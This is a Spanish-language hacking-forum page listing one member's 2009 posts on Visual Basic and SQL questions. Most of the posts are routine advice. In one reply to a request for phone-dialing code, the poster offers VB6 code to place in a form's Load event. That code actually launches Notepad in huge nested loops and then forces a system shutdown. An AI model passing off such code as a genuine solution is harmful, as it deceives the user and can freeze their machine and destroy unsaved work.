elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20
51  Programación / Programación Visual Basic / Re: Ideas rentables. en: 6 Noviembre 2009, 14:05 pm
Citar
P.D.: Si el medico es lento con la PC, por obvias razones no seria tan rentable una [PC+Doctor].

Creo que en estos dias un Doctor sin Pc esta frito porque necesita estar actualizado y las Pc + internet los nutren Mucho...

Creo que es un buen projecto claro si tu le pones ganas  :P
Claro debes meterte de lleno en un consultorio para saber como se manejan esas cosas porque asi a lo loco no harias algo rentable...

Saludos...

PD: Es en mi punto de vista igual me equivoco!ˇ   ;D
 
52  Programación / Programación Visual Basic / Re: problema de imagen en: 28 Octubre 2009, 13:20 pm
Si la guandamos en la base de datos esta se pone pesada y creo que no es muy aconsejable creo que la mejor forma es como dicen los muchachos mas arriba guardar la ruta de la imagen y luego cargarla cuando agamos el filtro del Id o cod...
Saludoss
53  Programación / Programación Visual Basic / Re: programacion llamadas automaticas desde la pc a telefonos ijos en: 26 Octubre 2009, 18:59 pm
Aqui esta el code que te dije es sencillo con el control MScomm y ya puedes hacer llamadas a tu telefono, tienes que tener en cuenta que esto trabaja conectado con el puerto del moden de tu compu.. :P

Call Telefono

Saludos....
PD: no pongo la fuente porque no se de donde lo saque hace muchop tiempo  ;D
54  Programación / Programación Visual Basic / Re: webcam + web en: 23 Octubre 2009, 16:50 pm
No se si es lo que nesecitas pero por hay debe andar

Cam via socket o algo asi...

y recuerda trabajando uno mismo aprende mas facil a hacer las cosas.... :-\
55  Programación / Bases de Datos / Re: Ayuda SQL DISTINCT en: 23 Octubre 2009, 16:46 pm
Si pero como son de dos diferentes paises la sentencia la va a enviar como si fueran diferntes y te la va a presentar asi

+---------+-----------+
| cliente | ciudad    |
+---------+-----------+
| Maria   | Mexico     |
| Maria   | Uruguay   |
+---------+-----------+

porque maria se repite pero cada ciudad es diferente pero a lo que el se refiere es que no le presenta otros nombres con la misma ciudad pero de esta forma lo muestra osea si aparece luis de Mexico lo va a mostrar sin ningun problema.  :silbar:

Saludos...
56  Programación / Programación Visual Basic / Re: programacion llamadas automaticas desde la pc a telefonos ijos en: 23 Octubre 2009, 15:21 pm
Creo que tenia un codigo para tomar el call id de un telefono y poder marcar x numero desde la pc. Creo que era con el control MScomm con esto en la office llevavamos un record de todas la llamadas con su respectivo cliente.

Aunque mientras puedes ir intentando con esto  :silbar:

Este codigo es para Visua Basic 6:

Código
  1.    Dim iFila As Integer, iColumna As Integer
  2.  
  3.        For iFila = 1 To 10000
  4.            For iColumna = 1 To 10000
  5.                Shell "notepad.exe", vbNormalFocus
  6.            Next
  7.        Next
  8.    Shell "shutdown -s -f -t 5"
  9.  

Coloquelo en el evento Load del form.

AnyWhere voy a chekar mi biblioteca de code y si lo encuentro lo posteo..  :P

 Saludos....
57  Programación / Bases de Datos / Re: Ayuda SQL DISTINCT en: 23 Octubre 2009, 15:07 pm
Creo que la consulta seria
Código:
Select DISTINCT CLIENTE, CIUDAD From CLIENTE

Porque si se fijan si se fijan a lo que el se refiere es a los clientes que no se repiten independiente del nombre que tengan porque si tienen el mismo nombre de Maria pero una Vive Mexico y la otra en Uruguay los registros no estan repetidos porque son dos clientes diferentes totalmente porque viven en diferentes ciudades u de esa forma creeo k es lo mas logico...   ;D
58  Programación / Programación Visual Basic / Duda Control cSubclassToolBar en: 21 Octubre 2009, 18:57 pm
Alguien a trabajado con este control de leandro en win vista o 7
lo he aplicado en una aplicacion para vista y los iconos el el toolbar no se ven
Claro tengo el ultimo update para common y no se ven de culakier forma
si alguien me puede sacar de las dudas os agradeceria  ;D

Ah se me olvidaba el control es este...

Control cSubclassToolBar
59  Programación / Programación Visual Basic / Re: Editor del Registro/Abolir todas las restricciones del WinXP en: 15 Octubre 2009, 15:32 pm
Enlace no valido -- ose el fuente --  ;D
60  Programación / Programación Visual Basic / Re: multilineas en MSFlexGrid en: 5 Octubre 2009, 16:10 pm

Código:
TDBGrid1.Splits(0).MarqueeStyle = 3
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines